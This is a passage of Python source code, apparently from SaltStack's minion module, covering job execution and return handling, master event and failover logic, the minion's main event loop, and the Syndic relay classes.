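    # tornado.stack_context.StackContext(minion_instance.ctx), so each job
    # runs with cloned context dicts for functions, returners, and executors.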
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the actual
        minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
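            # data['ret'] may name several returners as a comma-separated
            # string (for instance 'mysql,redis'); each listed returner
            # receives a copy of the return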
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target; it starts the actual
        minion-side execution of a multi-function job.
        '''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
        # duplicate namespaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
        '''
        Manage the minion's job schedule
        '''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
        elif tag.startswith('__schedule_return'):
            # reporting current connection with master
            if data['schedule'].startswith(master_event(type='alive', master='')):
                if data['return']:
                    log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
            self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
                # not my master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
                # if the master failback event is for the current master, raise an exception
                elif data['master'] == self.opts['master']:
                    raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                        # make the schedule use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
            salt.crypt.AsyncAuth.creds_map[key] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
        :rtype: None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
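        # ping_interval is configured in minutes; convert it to seconds here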
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
                    log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
                # In the filtering-enabled case, we'd like to know when the minion sees something it shouldn't
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
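        # e.g. a publication with tgt_type 'grain' and tgt 'os:Ubuntu' is
        # dispatched to self.matcher.grain_match('os:Ubuntu', delimiter=':')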
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion: this minion uses the minion keys on the
    master to authenticate with a higher-level master.
    '''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
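        # (the differing defaults, 0 vs 1, guarantee a mismatch when either
        # side lacks a master_id, so such jobs are always forwarded)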
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus, assuming that these are handled outside
        the tune_in sequence
        '''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller, so give it back before
        # it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
    '''
    Make a MultiMaster syndic minion: this minion relays jobs and returns from
    all minions connected to it to the list of masters it is connected to.
    Modes (controlled by `syndic_mode`):
        sync: This mode will synchronize all events and publishes from higher level masters
        cluster: This mode will only sync job publishes and returns
    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, that the return will end up in a zmq buffer
    in this Syndic headed to that original master.
    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way), this daemon does not handle failure well;
    it will (under most circumstances) stall for ~15s trying to forward events
    to the downed master.
    '''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
        # List of delayed job_rets which we were unable to send for some reason
        # and which will be re-sent to any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
